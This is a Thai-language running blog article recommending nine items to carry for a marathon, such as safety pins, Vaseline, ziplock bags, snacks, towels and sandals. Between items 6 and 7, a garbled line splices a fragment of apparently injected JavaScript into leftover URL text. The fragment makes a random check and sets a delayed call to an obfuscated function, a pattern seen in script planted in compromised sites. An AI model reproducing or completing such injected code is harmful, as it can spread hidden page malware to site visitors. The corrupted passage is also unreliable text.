อุปกรณ์อะไรบ้างที่ควรพกพาไประหว่างวิ่งแข่งขันมาราธอน ถ้าไม่นับอุปกรณ์บังคับอย่าง BIB และชุดเสื้อผ้ารองเท้าวิ่งแข่งขัน จากประสบการณ์การวิ่งมาราธอนของผู้เขียน มีอุปกรณ์ 9 อย่างที่อยากนำมาแนะนำให้ลองติดตัวติดกระเป๋าไป และสามารถใช้ได้ทุกงานวิ่ง ไม่ว่าจะเป็นระยะมาราธอนหรือจะเป็นระยะมินิและฮาร์ฟมาราธอนก็ตาม
Marathon survival kit : แนะนำ 9 อุปกรณ์ติดตัว ติดกระเป๋า สำหรับวิ่งมาราธอน
1. เข็มกลัดเอกประสงค์ ไม่ว่าคุณจะเตรียมที่หนีบ BIB มาพร้อมแค่ไหน เวลาจะเรียกใช้ มันก็จะหายไปทุกที หรือจำนวนมีไม่พอ เวลาต้องการติดเพิ่มกันหลุดหรือเลื่อนตำแหน่งใหม่ ไม่ก็เพื่อนคุณขอยืมใช้ เข็มกลัดคืออุปกรณ์จำเป็นที่ต้องถูกใช้ทุกงานเสมอ
2. ที่มัดผมหรือหมวก หากผมคุณยาวเกินคางลงไป เราแนะนำให้ทำการผูกมัดผมให้เรียบร้อย โดยเฉพาะนักวิ่งผู้หญิง ที่มัดผมจะช่วยให้ผมคุณไม่สะบัดประหน้าไปมา ไม่ทำให้เหงื่อไหลกระเด็น แถมให้อากาศไหลผ่านระบายเหงื่อได้ดีด้วย ส่วนหมวกนี้ นอกจากจะช่วยกันแดดแล้ว ยังสามารถใช้ใส่จัดทรงผมให้อยู่เป็นที่เป็นทางและช่วยกันเหงื่อไม่ให้ไหลเข้าตาด้วย
3. วาสลีน กรณีที่เราต้องวิ่งเป็นระยะทางไกล โอกาสเกิดการเสียดสีระหว่างผิวหนังบริเวณขาหนีบและไหล่รักแร้มีสูง นักวิ่งมีโอกาสเกิดแผลสดและมีอาการแสบได้ เราแนะนำให้ทาบวาสลีนก่อนออกวิ่งมาราธอนทุกครั้ง เพื่อลดการเสียดสีลง ให้คุณวิ่งได้สบายตัวตลอดระยะทาง
4. ถุง Ziplock ถุงพลาสติกอเนกประสงค์ที่คุณสามารถใส่เศษเงินและโทรศัพท์มือถือได้ระหว่างวิ่ง ไม่ต้องกลัวว่าเหงื่อจะไหลซึมเข้าหรือเปียกหากเกิดฝนตก หากมีมากกว่าหนึ่ง เราก็แนะนำให้พกใส่กระเป๋าหรือถุง Goodie bag ไว้ด้วย เพราะจะเอาไว้ใส่ชุดเสื้อผ้าวิ่งที่เปียกเหงื่อ ช่วยป้องกันไม่ให้ชุดเสื้อผ้าอื่นๆ ถูกเหงื่อเปียกไปด้วย
5. ขนมขบเคี้ยว เสบียงอาหารพวกถั่วธัญพืชแบบแท่งหรือกล้วยตากแห้งแบบแพคเป็นถุงๆ สะดวกในการฉีกและรับประทานได้เลย เพราะการวิ่งมาราธอนนอกจากเรื่องการฝึกฝนแล้ว ยังเกี่ยวกับการรักษาระดับน้ำในร่างกายและแคลอรี่ที่ต้องเติมกลับคืนเป็นระยะๆ
6. ผ้าเช็ดตัว ผ้าเช็ดตัวทั้งขนาดเล็กและขนาดใหญ่ สำหรับใช้เช็ดเปลี่ยนเป็นชุดใหม่ที่แห้ง เพื่อป้องกันอาการเหนียวเหนอะหนะ ให้ร่างกายได้ระบายเหงื่อและอุณหภูมิได้ง่าย แถมป้องกันโรคผิวหนังจากเชื้อราด้วย นอกจากนี้สำหรับผ้าเช็ดตัวขนาดใหญ่ยังสามารถใช้คลุมตัวเพื่อป้องกันอุณหภูมิลดลงหลังจบการวิ่ง ซึ่งส่วนมากในเมืองหนาวจะมีการแจกผ้าห่มฉุกเฉิน พวกฟลอยด์คลุมตัวเพื่อรักษาอุณหภูมิร่างกายให้คงที่ แต่สำหรับเมืองร้อนอย่างประเทศไทยมักไม่ค่อยได้ใช่เท่าไหร่ ถ้าไม่ใช้ช่วงฤดูหนาว

andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and-everything-you-need-to-know%2F&psig=AOvVaw2_16UdDBT44TvjfCShgYo5&ust=1547823081957930″>JustRunLah!
7. ผ้า Compression อุปกรณ์เสริมอย่างเช่น ที่รัดน่อง หรือถุงเท้ารัดกล้ามเนื้อ เพราะอุปกรณ์ที่รัดกล้าเมเนื้อ (Compression) จะช่วยให้การฟื้นตัวทำงานได้เร็วขึ้น เหมือนกับการนวดกล้ามเนื้อให้เลือดไหลเวียนดีขึ้น
8. ทิชชู่แห้งหรือทิชชู่เปียก สำหรับเช็ดทำความสะอาดมือเท้าหรือร่างกายเวลาเข้าออกห้องน้ำหรือช่วงรับประทานอาหารหลังจบการวิ่ง บางครั้งก็เดินหาที่ล้างมือไม่ได้ การมีพวกทิชชู่เปียกเช็ดมือให้สะอาดก็ถือว่าใช้งานสะดวกและง่ายต่อการเก็บทิ้งด้วย
9. รองเท้าแตะ หลังเข้าเส้นชัยทำการยืดเหยียดกล้ามเนื้อและเปลี่ยนเสื้อผ้าเรียบร้อยแล้วคงไม่มีใครอยากใส่รองเท้าวิ่งกันอีกละครับ เปลี่ยนเสื้อผ้าชุดใหม่เพื่อให้ร่างกายนักวิ่งโปร่งสบายตัว ขณะเดินไปมาเพื่อเติมน้ำและแคลอรี่กลับคืนร่างกาย อุปกรณ์ที่จะช่วยอำนวยความสะดวกในการเคลื่อนที่ไปมาอย่างคล่องและสบายตัวที่สุดคือ รองเท้าแตะ
นอกจากน้ำดื่มที่เราเตรียมไว้เอง ก็อย่าลืมเตรียม Post-race snack ไว้ด้วยครับ เพราะหลายครั้งที่เรามาถึงเส้นชัยก็กินเวลาเยอะแล้ว เวลามุ่งหน้าไปที่จุดบริการน้ำอาหาร พวกอาหารที่ขายดี ที่นักวิ่งมาราธอนควรจะได้ มักจะหมดก่อนเป็นอันดับแรกๆ ถ้าผู้จัดไม่ได้แบ่งพื้นที่ให้เป็นที่เป็นทาง นี้ของระยะมินิมาราธอน นี้ของระยะฮาร์ฟมาราธอน นักวิ่งระยะอื่นๆ จะเข้ามารับประทานอาหารของระยะมาราธอนไปจนหมดซะก่อนทุกที การมีขนมหรืออาหารรองท้องจะช่วยเราได้เยอะ แล้วค่อยไปจัดเต็มอีกทีที่มื้อฉลอง
อ้างอิง womensrunninguk.co.uk www.active.com